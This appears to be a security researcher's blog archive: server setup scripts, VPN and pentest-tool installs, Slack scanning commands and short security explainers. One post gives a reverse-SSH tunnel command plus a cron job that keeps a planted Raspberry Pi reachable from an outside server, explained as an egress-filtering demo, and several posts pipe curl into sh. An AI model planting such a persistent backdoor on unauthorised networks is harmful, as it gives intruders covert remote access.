My First 10 Seconds On A Server

While doing security research it is not uncommon for me to build and destroy between 20 and 25 cloud servers a week on Digital Ocean.
While there are great guides like:
My First 10 Minutes On a Server – Primer for Securing Ubuntu
My First 5 Minutes On A Server; Or, Essential Security for Linux Servers
I do not have the time to manually follow these guides on a server I may shut down in an hour so I have slowly been building a shell script to do a lot of this for me.
Now the first thing I do when I log into a box is:
curl -sSL https://raw.githubusercontent.com/jgamblin/quickinstall/master/quickinstall.sh | sh
Screen Shot 2016-07-13 at 8.20.56 AM
The script does the following:
Enables UFW and denies all inbound traffic except for SSH.
Sets the timezone to Universal Coordinated Time
Installs  Python, Ruby, nodejs, Docker.io, Fail2Ban and unattended-upgrades
Launches a PCAP docker container to capture all server traffic in a PCAPs.
While it is not pretty it does what I need:

#
#Install and configure firewall
#
echo -e "\nInstalling and configuring firewall\n"
apt-get install ufw -y
ufw default deny incoming
ufw default allow outgoing
ufw allow ssh
cat /etc/ufw/ufw.conf | sed 's/ENABLED=no/ENABLED=yes/g' > ~/ufw.conf
chmod 0644 ~/ufw.conf
mv -f ~/ufw.conf /etc/ufw/ufw.conf
#
# set timezone to Universal Coordinated Time
#
sudo timedatectl set-timezone UTC
#
# Upgrade installed packages to latest
#
apt-get update && apt-get dist-upgrade -y
#
#Install stuff I use all the time
#
apt-get install -y build-essential checkinstall docker.io fail2ban git git-core libbz2-dev libc6-dev libgdbm-dev libncursesw5-dev libreadline-gplv2-dev libsqlite3-dev libssl-dev nikto nmap nodejs python-dev python-numpy python-scipy python-setuptools tk-dev unattended-upgrades
#
#Install Ruby
#
curl -L https://get.rvm.io | bash -s stable --ruby
#
#PCAP Everything
#
docker run -v ~/pcap:/pcap --net=host -d jgamblin/tcpdump

I will continue to build this out in this github repo .

The VPN You Should Be Using

There has been a lot of talk about why you should use a VPN on public networks and why it shouldn’t be a commercial one.
I am a huge fan of  the Streisand privacy stack because it includes and  L2TP/IPsec VPN, OpenConnect, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, and a Tor bridge all in one amazing package.
The problem with Streisand though is the install is amazingly complicated using  ansible from your local system to a cloud provider using API calls and if you are not in a shop that uses this technology it can be difficult to get working correctly so I have hacked the install simplified the install to install it directly on a digitalocean server (but this should work everywhere).
The steps are as follows:
Create a new  digitalocean Ubuntu 14.04 droplet named streisand with your SSH key.
The $5 droplet “works” but if you are not going to keep it running all the time (I wouldnt) I would spin this up on a $20 a month droplet when needed (say for a trip out of the country or to blackhat).
Run the following commands to install the prerequisites:
sudo apt-get update && sudo apt-get install -y git python-paramiko python-pip python-pycurl python-dev build-essential
sudo pip install ansible markupsafe dopy==0.3.5
Download and configure strisand with the follwoing commnads: 
git clone https://github.com/jlund/streisand.git && cd streisand/playbooks
sed -i 's/streisand-host/127.0.0.1/g' streisand.yml
sudo ansible-playbook -i "localhost," -c local streisand.yml
sed -i "s/localhost/$(curl -s ipecho.net/plain)/g" ../generated-docs/streisand.html
(This takes between 10 and 15 minutes to complete. )
Use streisand for safer internet: 
Copy generated-docs/streisand.html to your local machine using scp or just cat and paste (cat ../generated-docs/streisand.html) and it will have all the information you need to use your new privacy server on almost every device you own.  You can also share this information with your family or team as one server should support 4 or 5 users.
Screen Shot 2016-07-10 at 3.59.57 PM
If you trust me (and you shouldnt) here is a bash script to automate the install:
https://gist.github.com/jgamblin/3100b682510119722c56f5667fa2e18b

Installing The Lair Framework With 7 Commands

I worked with a consultant using the lair framework two years ago and since then I have been a huge fan of the project to manage pentest information.
Screen Shot 2016-07-08 at 8.03.22 PMTom Steele has done an amazing job with the project  but it has been a pain to install but thanks to Ryan Hanson and Docker you can now setup a lair instance with 7 simple commands on a clean (digitalocean) Ubuntu 16.04 install:
curl -sSL https://get.docker.com/ | sh
curl -L https://github.com/docker/compose/releases/download/1.6.2/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose
chmod +x /usr/local/bin/docker-compose
git clone https://github.com/ryhanson/lair-docker.git
cd lair-docker
docker-compose build
docker-compose up
From there you can start importing data with drones or entering it manually but with the installation bar lowered you  do not have a reason to not give this amazing tool a try!

Using Shipyard To Manage Docker Containers

While getting ready to teach an “introduction to penetration testing with docker ” class I stumbled across the Shipyard-Project which brings an amazing web based interface to docker.
Installing on Debian on DigitalOcean is as simple as starting a droplet and running these two commands:
curl -sSL https://get.docker.com/ | sh
curl -sSL https://shipyard-project.com/deploy | bash -s

Update:  Running scripts you have not read through is a really bad idea (almost as bad as suggesting you do so). Make sure you take a look at the docker and shipyard  scripts before you run them.

From there you have an amazing docker interface at http://yourip:8080

 

Screen Shot 2016-06-09 at 8.32.08 PM

You Can Pull And Manage Images:

Screen Shot 2016-06-10 at 6.09.54 AM
Configure Containers:

Screen Shot 2016-06-10 at 6.11.36 AM
Easily Control Containers:

Screen Shot 2016-06-10 at 6.11.56 AMCheck Stats and Logs:

Screen Shot 2016-06-10 at 6.13.49 AM Screen Shot 2016-06-10 at 6.13.59 AMAccess Containers Console:

Screen Shot 2016-06-10 at 6.14.30 AM
While the CLI for docker isn’t hard to learn this does seem like the “Killer App” that could help people adopt containers.  I know I will be using it to manage my containers from here on out and recommending it to as many people as I can.

Slack Commands For Security Professionals

At work we  are moving to slack as a communication method and since I am spending so much time in the tool I decided it was time to start building in some of the tools I use on a regular basis.  So far I have put together the following tools:

/NMAP

Nmap-For-Slack runs a basic scan (nmap –top-ports 50 –open) against a host and returns the results.  I have to do such a basic scan because the timeout is 3000ms so it limits what I can do.
Screen Shot 2016-05-15 at 3.31.44 PM

/DNSRECON

DNSRecon-for-slack allows your to run a basic DNSRecon scan from inside of  Slack.
Screen Shot 2016-05-15 at 3.43.28 PM

/IPINFO

ipinfo-for-slack looks up and displays information from ipinfo.io.
Screen Shot 2016-05-15 at 3.36.01 PM

/HOSTLOOKUP

Hostlookup-for-slack grabs all the A records for a domain and displays them.
Screen Shot 2016-05-15 at 3.42.15 PM

Technical Configuration:

 

download

 
This configuration needs the following: 
Slack team.
Publically Accessible Web Server Running:
Apache
PHP
Valid DNS Record and TLS Cert
I really like a $5 DigitalOcean droplet for this.
A list of APIs you want to query or installed local security tools (nmap, dnsrecon) you want to run. 

To Do List:

Figure out how to display json blobs as flat text in html.
Figure out how to bypass 3000 ms timeout to run more complex commands.
Build a bunch more of these tools (nessus, shodan, censys.io are on the list).
If you want to help me on any of these please reach out to me on twitter at @jgamblin or via email.

OSX System Information Script

This morning I needed someone who I was helping to provide me some basic information about their Macbook and realized while I knew how to get that information it wasnt all in one easy to digest place so I wrote sysinfo.sh to quickly gather that information:
Screen Shot 2016-04-29 at 9.29.52 AM
Here is the code:
https://gist.github.com/jgamblin/aa9a6eda5bce6797ab8394e0c47d3676
You will need to install iStats (gem install iStats) or comment out the lines 9, 10, 12 and 13 to get the script to run properly.

Explaining the difference between a threat, a vulnerability and a risk.

During a recent round of phone interviews while expanding my team at work I was amazed at how many security professionals have a hard time clearly answering the following question:
 “What’s the difference between a threat, a vulnerability and a risk?” 
I think being able to do so is a key to being a good security professional.   I really like to use this analogy to try to help explain these three concepts clearly:

25D3A47F00000578-0-image-a-72_1424353548514“Close the open door (vulnerability) to stop the bear (threat). If it got in we could get mauled (risk).”

Understanding and applying these three terms is the first step to being able to do great risk analysis and is the only way to effect change in most organizations.  The next step is writing risk statements.

But remember doing this exercise is as much for you as it is for who you are trying to secure.  It wouldn’t make much sense to use your limited cycles to protect yourself against bears in Dallas, Texas would it?

bear-areas-map

 

Persistent Reverse-SSH Tunnel on a RaspberryPi

I have a couple of old Raspberry Pi’s 2 laying around and have been meaning to turn them into “Remote Access Terminals” to demonstrate what happens if you do not do effective egress filtering on your network. At a high level if an attacker can plug in one of these on your network and get internet access they own your network.
Here is a terrible diagram I put together using draw.io to explain:
Untitled Diagram
To set this up you will need the following:

There are plenty of guides on setting this up so I won’t spend time doing that here. Once you have that complete and are on the pi you can run the the following command:
autossh -M 65500 -o ServerAliveInterval=20 -R 2222:localhost:22 root@digitalocean

Autossh will use ports 65500 and 65501 to send echo data over and back between server and host and open an ssh session on the public server to local port 2222 that will tunnel back to the SSH port on the Pi.
Once that is done you can ssh into your public ssh server and run the following command:
ssh -p 2222 [email protected]

Congratulations you now have a host you can control from the internet on a private network (That you totally have permission to be plugged into, right?).
back-door
While this works if the pi is has any problems the tunnel will be gone so we will use a cron job to make sure that it is always up.  You can use the following crontab entry that checks if the tunnel is up every minute:
* * * * * pi /usr/bin/screen -S reverse-ssh-tunnel -d -m autossh -M 65500 -i /home/pi/.ssh/id_rsa -o "ServerAliveInterval 20" -o "ServerAliveCountMax 3" -R 2222:localhost:22 root@digitalocean
Reboot the Pi to test and you should be good to go.

NetAidKit on a GL-inet 6416

I have been playing with the GL.inet hardware lately and stumbled upon this project called NetAidKit that is built on the $25 6416 platform that offers a purpose built TOR and VPN router.
After building the images using the instructions on their github page (here is the one I built if you trust me) all you have to do is upload it and reboot and you are in business:
Screen Shot 2016-04-19 at 6.15.51 PM
The TOR feature worked flawlessly:
Screen Shot 2016-04-19 at 7.09.00 PMScreen Shot 2016-04-19 at 7.09.47 PM
The VPN still needs a lot of work as it expects certificate based authentication and every VPN I use still uses username and password authentication so I was disappointed I didn’t get to try it out.
Screen Shot 2016-04-19 at 7.03.31 PM
Over all this is an amazing project with a great idea and lots of potential.  I will be carrying a netaidkit with me from now on even if it just to use with TOR.

Shodan2Sheets

After spending last night working on a Reverse DNS Function for Google Sheets I couldnt leave well enough alone and wrote Shodan2Sheets tonight using the shodan.io api.
Screen Shot 2016-04-04 at 9.49.25 PM
It provides a lot more information than the reverse lookup function and all you should have to do is copy your API key to C2 and then start filling in IP addresses in the A column.   You can download a copy here.

Site Footer